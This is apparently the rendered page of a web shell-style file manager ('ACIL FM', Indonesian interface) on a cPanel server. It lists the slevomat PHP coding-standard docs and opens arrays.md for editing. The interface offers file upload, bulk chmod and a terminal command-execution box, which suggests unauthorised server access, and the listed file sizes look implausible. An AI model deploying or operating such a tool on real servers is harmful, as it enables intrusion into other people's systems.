ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/slevomat/coding-standard/doc
/
opt
cpanel
ea-wappspector
vendor
slevomat
coding-standard
doc
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
arrays.md
1.58 MB
chmod
View
DL
Edit
Rename
Delete
attributes.md
1.75 MB
chmod
View
DL
Edit
Rename
Delete
classes.md
13.82 MB
chmod
View
DL
Edit
Rename
Delete
commenting.md
5.72 MB
chmod
View
DL
Edit
Rename
Delete
complexity.md
288 B
chmod
View
DL
Edit
Rename
Delete
control-structures.md
9.32 MB
chmod
View
DL
Edit
Rename
Delete
exceptions.md
1.14 MB
chmod
View
DL
Edit
Rename
Delete
files.md
2.54 MB
chmod
View
DL
Edit
Rename
Delete
functions.md
5.21 MB
chmod
View
DL
Edit
Rename
Delete
namespaces.md
7.76 MB
chmod
View
DL
Edit
Rename
Delete
numbers.md
625 B
chmod
View
DL
Edit
Rename
Delete
operators.md
1.11 MB
chmod
View
DL
Edit
Rename
Delete
php.md
3.09 MB
chmod
View
DL
Edit
Rename
Delete
strings.md
392 B
chmod
View
DL
Edit
Rename
Delete
type-hints.md
10.71 MB
chmod
View
DL
Edit
Rename
Delete
variables.md
749 B
chmod
View
DL
Edit
Rename
Delete
whitespaces.md
623 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/slevomat/coding-standard/doc/arrays.md
## Arrays #### SlevomatCodingStandard.Arrays.AlphabeticallySortedByKeys 🔧 Arrays should be defined with keys in alphabetical order. It defines where new entries should be inserted. It reduces merge conflicts and duplicate entries. This sniff enforces natural sorting of array definitions by key in multi-line arrays. #### SlevomatCodingStandard.Arrays.ArrayAccess 🔧 Disallow whitespace between array access operator and the variable, or between array access operators. #### SlevomatCodingStandard.Arrays.DisallowImplicitArrayCreation Disallows implicit array creation. #### SlevomatCodingStandard.Arrays.DisallowPartiallyKeyed 🚧 Array must have keys specified for either all or none of the values. #### SlevomatCodingStandard.Arrays.MultiLineArrayEndBracketPlacement 🔧 Enforces reasonable end bracket placement for multi-line arrays. #### SlevomatCodingStandard.Arrays.SingleLineArrayWhitespace 🔧 Checks whitespace in single line array declarations (whitespace between brackets, around commas, ...). Sniff provides the following settings: * `spacesAroundBrackets`: number of spaces you require to have around array brackets * `enableEmptyArrayCheck` (default: `false`): enables check for empty arrays #### SlevomatCodingStandard.Arrays.TrailingArrayComma 🔧 Commas after last element in an array make adding a new element easier and result in a cleaner versioning diff. This sniff enforces trailing commas in multi-line arrays. Sniff provides the following settings: * `enableAfterHeredoc`: enables/disables trailing commas after HEREDOC/NOWDOC, default based on PHP version.
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply